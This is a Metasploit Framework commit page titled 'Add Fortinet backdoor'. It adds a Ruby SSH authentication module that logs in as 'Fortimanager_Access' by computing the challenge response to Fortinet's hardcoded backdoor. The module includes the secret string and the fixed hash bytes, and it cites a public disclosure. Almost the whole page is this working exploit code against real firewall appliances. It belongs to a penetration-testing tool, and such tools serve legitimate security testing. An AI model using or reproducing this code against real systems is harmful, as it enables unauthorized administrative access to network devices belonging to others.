infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add Fortinet backdoor

bug/bundler_fix
William Vu 2016-02-25 14:40:02 -06:00
parent b32f474e99
commit 83fad3e328
2 changed files with 96 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

95
lib/net/ssh/authentication/methods/fortinet_backdoor.rb Normal file
View File

@ -0,0 +1,95 @@
# -*- coding: binary -*-
# https://www.ietf.org/rfc/rfc4256.txt
class Net::SSH::Authentication::Methods::FortinetBackdoor < Net::SSH::Authentication::Methods::Abstract
USERAUTH_INFO_REQUEST = 60
USERAUTH_INFO_RESPONSE = 61
def authenticate(service_name, username = 'Fortimanager_Access', password = nil)
debug { 'Sending SSH_MSG_USERAUTH_REQUEST' }
send_message(userauth_request(
=begin
string user name (ISO-10646 UTF-8, as defined in [RFC-3629])
string service name (US-ASCII)
string "keyboard-interactive" (US-ASCII)
string language tag (as defined in [RFC-3066])
string submethods (ISO-10646 UTF-8)
=end
username,
service_name,
'keyboard-interactive',
'',
''
))
loop do
message = session.next_message
case message.type
when USERAUTH_SUCCESS
debug { 'Received SSH_MSG_USERAUTH_SUCCESS' }
return true
when USERAUTH_FAILURE
debug { 'Received SSH_MSG_USERAUTH_FAILURE' }
return false
when USERAUTH_INFO_REQUEST
debug { 'Received SSH_MSG_USERAUTH_INFO_REQUEST' }
=begin
string name (ISO-10646 UTF-8)
string instruction (ISO-10646 UTF-8)
string language tag (as defined in [RFC-3066])
int num-prompts
string prompt[1] (ISO-10646 UTF-8)
boolean echo[1]
...
string prompt[num-prompts] (ISO-10646 UTF-8)
boolean echo[num-prompts]
=end
name = message.read_string
instruction = message.read_string
_ = message.read_string
prompts = []
message.read_long.times do
prompt = message.read_string
echo = message.read_bool
prompts << [prompt, echo]
end
debug { 'Sending SSH_MSG_USERAUTH_INFO_RESPONSE' }
send_message(Net::SSH::Buffer.from(
=begin
byte SSH_MSG_USERAUTH_INFO_RESPONSE
int num-responses
string response[1] (ISO-10646 UTF-8)
...
string response[num-responses] (ISO-10646 UTF-8)
=end
:byte, USERAUTH_INFO_RESPONSE,
:long, 1,
:string, custom_handler(name, instruction, prompts)
))
else
raise Net::SSH::Exception, "Received unexpected message: #{message.inspect}"
end
end
end
# http://seclists.org/fulldisclosure/2016/Jan/26
def custom_handler(title, instructions, prompt_list)
n = prompt_list[0][0]
m = Digest::SHA1.new
m.update("\x00" * 12)
m.update(n + 'FGTAbc11*xy+Qqz27')
m.update("\xA3\x88\xBA\x2E\x42\x4C\xB0\x4A\x53\x79\x30\xC1\x31\x07\xCC\x3F\xA1\x32\x90\x29\xA9\x81\x5B\x70")
h = 'AK1' + Base64.encode64("\x00" * 12 + m.digest)
[h]
end
end

1
lib/net/ssh/authentication/session.rb
View File

@ -7,6 +7,7 @@ require 'net/ssh/authentication/methods/publickey'
require 'net/ssh/authentication/methods/hostbased' require 'net/ssh/authentication/methods/hostbased'
require 'net/ssh/authentication/methods/password' require 'net/ssh/authentication/methods/password'
require 'net/ssh/authentication/methods/keyboard_interactive' require 'net/ssh/authentication/methods/keyboard_interactive'
require 'net/ssh/authentication/methods/fortinet_backdoor'
module Net; module SSH; module Authentication module Net; module SSH; module Authentication